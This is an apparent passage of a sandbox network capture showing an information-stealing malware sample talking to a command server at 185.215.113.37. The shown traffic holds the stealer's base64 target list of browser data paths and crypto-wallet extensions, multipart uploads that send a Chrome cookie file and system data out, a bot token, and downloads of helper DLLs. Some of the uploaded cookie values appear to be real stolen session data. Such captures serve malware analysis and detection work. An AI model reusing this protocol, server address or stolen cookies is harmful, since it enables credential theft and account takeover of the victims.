61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 26, 2024 21:14:06.497509956 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 26, 2024 21:14:06.498934031 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJEC Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="message"plugins------AKJEGCFBGDHJJJJJKJEC--
Sep 26, 2024 21:14:06.736583948 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:06 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 26, 2024 21:14:06.736602068 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Sep 26, 2024 21:14:06.736617088 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Sep 26, 2024 21:14:06.737592936 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Sep 26, 2024 21:14:06.737617016 CEST	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Sep 26, 2024 21:14:06.737632036 CEST	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Sep 26, 2024 21:14:06.739315033 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEH Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 2d 2d 0d 0a Data Ascii: ------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="message"fplugins------IIJDBAKKKFBFHIDGIIEH--
Sep 26, 2024 21:14:06.972462893 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:06 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 26, 2024 21:14:06.991645098 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGI Host: 185.215.113.37 Content-Length: 6843 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 21:14:06.991693020 CEST	6843	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 26, 2024 21:14:07.733366013 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 21:14:07.994122982 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 21:14:08.242585897 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:08 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 26, 2024 21:14:08.242669106 CEST	224	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Sep 26, 2024 21:14:08.242733955 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 26, 2024 21:14:08.243053913 CEST	1236	IN	Data Raw: ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 51 f6 0a 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 2a f6 0a 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc ff ff 83 ec 0c e9 d9 fe ff ff 89 7c 24 08 c7 44 24 Data Ascii: \|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=xgat9$pa\|aQtD$pa$aRR
Sep 26, 2024 21:14:09.673676014 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAK Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BGDBKKFHIEGDHJKECAAKContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------BGDBKKFHIEGDHJKECAAK--
Sep 26, 2024 21:14:10.407715082 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 21:14:10.487567902 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGC Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="file"------FHJKKECFIECAKECAFBGC--
Sep 26, 2024 21:14:11.222312927 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 21:14:11.866226912 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCA Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file"------CGIJKJJKEBGHJKFIDGCA--
Sep 26, 2024 21:14:12.593301058 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:11 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 21:14:12.955406904 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
